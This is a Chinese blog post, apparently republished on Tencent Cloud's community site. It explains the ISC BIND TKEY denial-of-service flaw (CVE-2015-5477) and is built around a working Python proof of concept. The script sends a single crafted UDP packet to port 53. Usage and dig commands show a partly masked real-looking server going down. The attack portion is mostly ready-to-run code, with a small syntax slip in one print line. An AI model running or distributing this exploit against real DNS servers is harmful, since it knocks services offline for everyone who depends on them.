前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一个数据包消灭一台服务器的DNS漏洞

一个数据包消灭一台服务器的DNS漏洞

作者头像
用户1467662
发布2018-03-30 11:16:00
6190
发布2018-03-30 11:16:00
举报
文章被收录于专栏:农夫安全

一个数据包消灭一台服务器的DNS漏洞

0x01 漏洞详情

ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套DNS域名解析服务软件。该软件被披露存在拒绝服务漏洞,由于TKEY查询的错误可导致BIND服务器发生REQUIRE断言失败并停止服务,攻击者利用漏洞可恶意构造数据包,导致TKEY记录查询错误,进而导致BIND服务器发生REQUIRE断言失败并停止服务。CNVD对该漏洞的综合评级为“高危”

0x02 DNS查询

dig X.cn

**以ns1.6.cn为测试对象**:

dig @nsX.X.cn X.cn

其中

ns1.X.cn. 1800 IN A 122.X.X.X

0x03 利用POC

**(****CVE-2015-5477****)**:

\#!/usr/bin/env python import socket import sys print('CVE-2015-5477 BIND9 TKEY PoC' if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + sys.argv[1] + ' ...') payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53)) print('Done.')

**使用方式**:

python dos.py 122.X.X.X

**再次查询**:

dig @ns1.X.cn X.cn

已经拒绝服务了

代码语言:javascript
复制
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-12-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 漏洞详情
  • 0x02 DNS查询
  • 0x03 利用POC
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档